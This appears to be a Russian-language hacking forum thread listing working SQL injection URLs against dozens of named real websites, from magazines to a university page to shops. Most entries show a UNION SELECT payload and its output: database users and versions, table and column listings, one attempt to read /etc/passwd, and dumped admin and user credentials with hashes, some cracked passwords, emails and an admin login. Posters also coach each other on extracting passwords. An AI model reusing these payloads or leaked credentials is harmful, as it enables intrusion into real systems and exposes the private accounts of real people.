USER: skratch@localhost
DATABASE: skratchmagazine

pkgmagazine.com
http://www.pkgmagazine.com/home/article.php?id=99999+union+select+1,2,VERSION(),4, 5,6,7/*
VERSION: 4.1.20
USER: rtcgroup@64.13.248.195
DATABASE: pkg

drumheadmag.com
http://www.drumheadmag.com/web/column.php?id=99999'+union+select+1,AES_DECRYPT(AE S_ENCRYPT(VERSION(),0x71),0x71)/*
VERSION: 4.1.13-standard
USER: drumhead_head@localhost
DATABASE: drumhead_drum

http://www.ns.umich.edu/htdocs/public/experts/ExpDisplay.php?ExpID=99999+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56/*

news@french.web.itd.umich.edu:news:4.1.21-max-log 2 4



http://www.unexplained-mysteries.com/viewarticle.php?id=57+union+select+1,2,3,4,5/*
unexplai@10.0.0.3:unexplai_forum:4.1.22-standard-log



http://www.joesportsfan.com/column.php?storyid=99999+union+select+1,2,3,4,5/*
mattsebek@whopper.dreamhost.com:joesportsfan:5.0.1 8-standard-log

Представляю Вашему вниманию сайт МОЛДАВСКИХ ПИ****СОВ (как Вам словосочетание?) :D

_http://www.gay.md/rus/story.php?sid=-634'+union+select+1,2,3,user(),5,version(),databas e(),8,9,10,11/*

gaymd@localhost
4.1.21
gaymd_

Ветка четвёртая ,зато таблица стандартная

_http://www.gay.md/rus/story.php?sid=-634'+union+select+1,2,3,4,5,concat(name,char(58),p assword),7,8,9,10,11+from+admins/*

Обратите внимание на ники
Сбрутился только один ,но я особо не напрягался

ViPer:dbd61e1da28f924ca21824e86e5a70ad
adm_lsb:95686fcef2ab9409831daa39852d4137
nataly:d5a4f7de4b6edd081fb6ff7fabdda89b
Junkie:1cb870fedd2196045a50916f3529f653
SSS:5ebe2294ecd0e0f08eab7690d2a6ee69 =secret

Не нравятся они мне очень :p

webpagemaintenance.com
http://www.webpagemaintenance.com/article.php?id=99999+union+select+1,VERSION(),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
VERSION: 4.0.20-Max
USER: wpm@localhost
DATABASE: wpmdb

web-site-development.biz
http://web-site-development.biz/product.php?id=99999+union+select+1,VERSION(),3,4, 5/*
VERSION: 4.1.22-log
USER: wsd@localhost
DATABASE: wsd_site

mh1webdesign.com
http://www.mh1webdesign.com/articles_view.php?id=99999+union+select+1,VERSION( ),3,4,5,6,7/*
VERSION: 4.1.22-standard
USER: mh1webde_mikey@localhost
DATABASE: mh1webde_articles

simplewebinc.com
http://www.simplewebinc.com/ecomm/view-store-details.php?id=99999+union+select+1,VERSION(),3,4, 5,6,7,8,9,10,11,12,13,14/*
VERSION: 4.1.22-standard
USER: simple@localhost
DATABASE: simple_greeting

http://www.pchardware.ro/Download/index.php?catid=-2+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11/*

a0lb5v@localhost
a00la
4.1.12

http://www.idapp.org/faqs/index.php?catid=-5+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9,10,11,12/*

voiloo.net

http://www.voiloo.net/rate.php?id=-1%20union%20select%20concat(user(),0x3a,database() ,0x3a,version()),2--

voiloo@localhost:voiloo:5.0.32-Debian_7-log

http://www.voiloo.net/rate.php?id=-1%20union%20select%20concat(username,0x3a,email,0x 3a,password),2+from+news_users--

admin:contat@voiloo.net:faba9f262f73605bb0ad8f2ff4 ae19d1

admin:springfield

///

hemija.net

http://www.hemija.net/link/rate.php?id=-1%20union%20select%20concat(user(),0x3a,version(), 0x3a,database()),2,3,4--

igor@localhost:5.0.45-log:hemija

freshairtimes.com

http://www.freshairtimes.com/scammerz/index.php?catid=-1%20union%20select%201,2,3,concat(user(),0x3a,vers ion(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15 ,16,17--
admin@ns2.freshairtimes.com:5.0.18:scammerz
http://www.freshairtimes.com/scammerz/index.php?catid=-1%20union%20select%201,2,3,table_name,5,6,7,8,9,10 ,11,12,13,14,15,16,17+from+information_schema.tabl es--
http://www.freshairtimes.com/scammerz/index.php?catid=-1%20union%20select%201,2,3,concat(email,0x3a,passw ord_enc),5,6,7,8,9,10,11,12,13,14,15,16,17+from+us er--

-----

askimam.org

http://www.askimam.org/hadith/hadith.php?hid=-1%20union%20select%201,concat(user(),0x3a,version( ),0x3a,database()),3,4,5--
askimam_user@66.23.135.20:5.0.41-community-nt:askimam
http://www.askimam.org/hadith/hadith.php?hid=-1%20union%20select%201,concat(email,0x3a,password) ,3,4,5+from+admin_t--
khalid@bitland.com:sufi@usa
http://www.askimam.org/hadith/hadith.php?hid=-1%20union%20select%201,concat(email,0x3a,password) ,3,4,5+from+user_t--
khalid@bitland.com:nasir

www.vetmag.ru

http://www.vetmag.ru/index.php?chp=forum&forumid=2%20and%200%20union%20select%201,2,3,4,aes _decrypt(aes_encrypt(concat_ws(0x3a,name,login,pas sword,email),1),1),6,7,8,9,10,11,12,13,14,15%20fro m%20admin--&act=showmessage&num=261'


http://www.vetmag.ru/admin/
login:vetmag
pass:moromo33


www.vettorg.ru

http://www.vettorg.ru/catalog/item.php?id=977%20and%200%20union%20select%201,2,3 ,concat_ws(0x3a,user_name,user_password,user_email ),5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20ve tgal_users%20limit%201,1--

kungfumagazine.com

http://ezine.c/news/index.php?month=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19--
http://ezine.kungfumagazine.com/news/index.php?month=-1%20union%20select%201,2,3,4,concat(user(),0x3a,ve rsion(),0x3a,database()),6,7,8,9,10,11,12,13,14,15 ,16,17,18,19--
root@localhost:4.0.22:kungfu
http://ezine.kungfumagazine.com/news/index.php?month=-1%20union%20select%201,2,3,4,concat(user,0x3a,pass word),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+m ysql.user--
root:07c02f3e4a89a46b

http://www.ve.free-travels.ru/
http://ve.free-travels.ru/books/item.php?id=0x3127%20union+select+1,2,3,4,5,6,7,8, 9,10,11,concat_ws(0x3a,user(),database(),version() ),13,14,15/*
freetravels_db@localhost:freetravels_db:5.0.27-log

http://www.maxilog.su/
http://www.maxilog.su/see_news.php?storyid=0x363227%20union+select+1,2,3 ,4,5,6,7,8,9,concat_ws(0x3a,user(),database(),vers ion()),11,12,13,14,15,16,17,18,19/*
maxilog1@localhost.localdomain:db_maxilog1:5.0.24-standard

Ну просто так :rolleyes:

http://www.fernando-heitor.de/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
http://www.dan-werbe.net/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
http://www.annuairedesecoles.net/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
http://www.annuairedesecoles.com/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
http://www.empleopropio.com/empleos/index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

Ziggy Marley
Вот ща че то сижу и думаю об этом... (Ну вы меня поняли))) и начал слухать музон Bob Marley и потом че то наткнулся на Ziggy Marley и на его сайт :)
Ну и сразу нашел инекцию)

http://ziggymarley.com/comments.php?id=194'%20union+select+1,2,3,4,concat _ws(0x3a,user(),database(),version()),6,7,8,9/*

tuffgong_w@209.68.2.15:tuffgong_main:4.1.20-log
Вот так вот :p
ббб ; )

cheap-web-hosting-info.com
http://www.cheap-web-hosting-info.com/hosting_review.php?id=99999+union+select+1,VERSION (),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21/*
VERSION: 4.1.20-max-log Review и 4.1.20-max-log Plans
USER: cheapwe_cheapweb@71.18.216.99 Review и cheapwe_cheapweb@71.18.216.99 Plans
DATABASE: cheapwe_cheapweb Review и cheapwe_cheapweb Plans

yi-hosting.com
http://d390281.h42.yi-hosting.com/book_details.php?id=99999+union+select+1,VERSION() ,3,4,5/*
VERSION: 4.1.22-log
USER: michell_fred@cart.readyserver.net
DATABASE: michell_data

visitrandolphcounty.com
http://www.visitrandolphcounty.com/shopping.php?id=99999+union+select+1,2,VERSION(),4 ,5,6,7,8,9,10,11,12,13,14,15,16/*
VERSION: 4.1.20
USER: visitran@localhost
DATABASE: visitrandolph

plaza-shopping.com
http://www.plaza-shopping.com/shop.php?id=99999+union+select+1,2,VERSION(),4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18/*
VERSION: 4.0.27-max-log
USER: plazashopping@linhost193.prod.mesa1.secureserver.n et
DATABASE: plazashopping

Мальчики, хелп. Вот как выудить из бд пароли? :( Пока все заканчивалось ошибкой((
http://www.angelbaby.ru/tovar.php?ld=1+union+select+1,2,user(),database(), 5,6,7,version(),9,10,11,12,13/*
babykn@localhost
5.0.45-community
babykn_angel

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
arhiv
category
disttxt
links
news
news_img
others
pages
produkt

http://www.ipoding.com/index.php?catid=99999+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21/*

ipoding@localhost:ipoding_rouge:4.0.21-log

http://www.ipoding.com/index.php?catid=99999+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21/*

ipoding@localhost:ipoding_rouge:4.0.21-log

http://forum.antichat.ru/showthread.php?p=413203

Мазда клуб
http://mazda-club.dn.ua/features/?id=-116+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(V ERSION(),0x71),0x71),6/*
version: 4.1.10a-standard
user: autoclubso_vas66@localhost
database: autoclubso_news
--------------------------------------
Что за форум там, я так и не понял

Мальчики, хелп. Вот как выудить из бд пароли? :( Пока все заканчивалось ошибкой((
http://www.angelbaby.ru/tovar.php?ld=1+union+select+1,2,user(),database(), 5,6,7,version(),9,10,11,12,13/*
babykn@localhost
5.0.45-community
babykn_angel

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
arhiv
category
disttxt
links
news
news_img
others
pages
produkt

Ну mysql базы там нет, точнее если и есть то она закрыта
а в остальных таблицах ничего интересного
если ты смотриш через INFORMATION_SCHEMA.TABLES
то лучше поройся через таблицу COLUMNS
пример

http://www.angelbaby.ru/tovar.php?ld=1+union+select+1,2,concat_ws(char(58) ,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),4,5,6,7,8,9, 10,11,12,13+from+information_schema.COLUMNS+limit+ 10+offset+280/*

TеcDоc
http://www.partsinfo.ru/tecdoc.php?pid=-1+union+select+3,4,5,6,7,concat(login,0x3a,passwor d,0x3a,email),9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25+from+users+limit+0,1/*
Кстате буду очень признателен, если найдёте программу TеcDоc - WEB SHOP

nossafe.net

http://www.nossafe.net/Artigos/artigo.php?numid=-1%20union%20select%201,2,3,4,5,6,7,8--
http://www.nossafe.net/Artigos/artigo.php?numid=-1%20union%20select%201,concat(user(),0x3a,version( ),0x3a,database()),3,4,5,6,7,8--
nossafe1@200.234.200.124:5.0.41--log:nossafe1

pororo.net

http://www.pororo.net/en/story/summary.php?Numid=-1%20union%20select%201,2,3,4,5,6,7--
http://www.pororo.net/en/story/summary.php?Numid=-1%20union%20select%201,2,3,4,5,concat(user(),0x3a, version(),0x3a,database()),7--
pororo@localhost:4.0.16:pororo

scottishclimbs.com

http://media.scottishclimbs.com/photopage.php?photoid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15--
http://media.scottishclimbs.com/photopage.php?photoid=-1%20union%20select%201,concat(user(),0x3a,version( ),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15--
scottishclimbs@localhost:5.0.44-log:scottishclimbs
http://media.scottishclimbs.com/photopage.php?photoid=-1%20union%20select%201,concat(table_schema,0x3a,ta ble_name,0x3a,column_name),3,4,5,6,7,8,9,10,11,12, 13,14,15%20FROM%20INFORMATION_SCHEMA.COLUMNS%20%20 WHERE%20column_name%20LIKE/**/0x257061737325/**/%20/**/limit/**/0,2--
scottishclimbs:AdminUsers:Password
http://media.scottishclimbs.com/photopage.php?photoid=-1%20union%20select%201,concat(id,0x3a,User,0x3a,Pa ssword),3,4,5,6,7,8,9,10,11,12,13,14,15+from+Admin Users--
1:Mark:48e8004a00203524
http://media.scottishclimbs.com/photopage.php?photoid=-1%20union%20select%201,concat(username,0x3a,user_e mail,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13 ,14,15+from+phpbb_users+where+user_id=2--
leewok:leeclimb@hotmail.com:566b2e95f1ca0a18fbab47 b4d2647da7

:)

tfleague.com :)

http://tf2.tfleague.com/viewclan.php?clanid=-1%20union%20select%201,concat(user(),0x3a,version( ),0x3a,database()),3,4,5,6,7--
tfleague_tfl@localhost:4.0.27-standard:tfleague_tf2

cggi.de

http://www.cggi.de/extern/forum.php?clanid=-1%20union%20select%201,2,3,4,5,6,7,8,9--
http://www.cggi.de/extern/forum.php?clanid=-1%20union%20select%201,concat(user(),0x3a,version( ),0x3a,database()),3,4,5,6,7,8,9--
root@localhost:4.0.21:cggi
http://www.cggi.de/extern/forum.php?clanid=-1%20union%20select%201,2,3,load_file(0x2F6574632F7 06173737764),5,6,7,8,9--
http://www.cggi.de/extern/forum.php?clanid=-1%20union%20select%201,2,3,concat(user,0x3a,passwo rd),5,6,7,8,9+from+mysql.user--
root:332d0c153f727e45:00761652
regentalgau:1e3af5ed433e592e
jurl:73bc31a80229bdac
juneutr:5ccfc99a7146c289
ff-gebelkofen:032c41e8435273a7:letmein
markusaumerde:024fd30c59f6ba50
gymmunity:46a481a3351571c8
rafardeon:35fc6ae571730216
schmidt:194974134b4b88c3:monk
tkammerl:17be5a8d493084f4:yxcvbnm
intstud:44b1954c62cbed60
sg1859:6cc0f6b914081bf1:Steyr
devit:18b3346f566cc3d7
ezmlm:37bc585a3c27174b
kaiser:7d1b74024b90d352
sharyosman:7976c7c43232c5a5
fpga:0a9963f132fd6525
typo3:0d9072351edc54dc
intwiso-home:6c33642d789ded64
igw:59ecf1cf6a1ee34a